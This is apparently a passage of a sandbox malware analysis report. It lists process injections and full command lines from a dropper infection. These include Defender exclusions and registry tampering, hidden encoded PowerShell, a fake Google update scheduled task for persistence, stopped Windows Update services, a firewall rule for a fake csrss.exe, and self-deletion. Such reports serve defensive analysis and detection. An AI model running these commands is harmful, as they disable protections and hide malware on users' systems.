PID 4148 wrote to memory of 2744 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4148 wrote to memory of 4144 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4148 wrote to memory of 4144 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4148 wrote to memory of 4144 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 4612 N/A C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
PID 4276 wrote to memory of 4612 N/A C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
PID 4276 wrote to memory of 4612 N/A C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
PID 4148 wrote to memory of 5048 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\allnewumm.exe

"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Random.exe

"C:\Users\Admin\AppData\Local\Temp\Random.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe

"C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe"

C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe

"C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe"

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe" --version

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f0,0x6ed874f0,0x6ed87500,0x6ed8750c

C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe

"C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe"

C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe

"C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe"

C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4148 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121225253" --session-guid=79dc5c52-c873-4ed6-b970-4ec9914ceb6f --server-tracking-blob=… --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C05000000000000

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6ddc74f0,0x6ddc7500,0x6ddc750c

C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe

.\Install.exe /IuCdidQXCBm "385118" /S

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gwusntZYb" /SC once /ST 11:05:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gwusntZYb"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --version

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xb21588,0xb21598,0xb215a4

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gwusntZYb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe\" rd /xzsite_idBSG 385118 /S" /V1 /F

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3468 -ip 3468

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 2176

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe

C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe rd /xzsite_idBSG 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3696 -ip 3696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

